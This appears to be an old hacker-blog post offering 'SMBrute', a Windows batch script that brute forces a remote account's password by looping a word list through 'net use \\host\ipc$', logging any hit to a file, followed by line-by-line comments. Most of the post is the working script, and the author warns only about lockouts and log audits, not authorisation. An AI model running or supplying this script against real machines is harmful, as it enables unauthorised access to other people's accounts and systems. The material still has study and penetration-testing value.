Some folks on a forum I frequent ( http://www.thebroken.org ) asked about brute forcing Windows passwords remotely. Brutus can do it, but I've had problems with it's reliability against SMB shares. Here's a little batch script I wrote that uses the Windows 2000/XP's "NET" command to find the password for a given account. I cribbed my password list from the folks that wrote Cain and Able but you can use any list you want. Download my script and Cain's password file from here. This is a very crude way to get the password to a remote Windows box, and if anyone audits the logs they will see a lot of failed login attempts. Be careful how you use this script as many systems are set up so that they lock accounts after too many failed login attempts.
Usage: smbrute machinename local-account-to-crack
echo SMBrute Script, Written by Irongeek: http://www.irongeek.com
echo Usage: smbrute machinename local-account-to-crack
echo Output: log.txt(debugging log) and output.txt (Holds password and machine name)
echo Stuff: make sure that you have a text file with your word list called
echo "wordlist.txt" in the same working directory.
if "%1"=="" goto end
if "%2"=="" goto end
FOR /F "tokens=1" %%i in (wordlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>log.txt && ^
echo %time% %date% >> outfile.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> outfile.txt && goto end
|Don't show the commands we
are running, just to make it pretty
Print out how to use the script.
Tell the user to put the word list in the same directory as the script.
Make sure the user gives input.
Delete the old log file.
Loop until the end of the password list file.
Print the current password attempt to the screen.
Use the "NET USE" command to try and start a session.
Write valid passwords to the output file.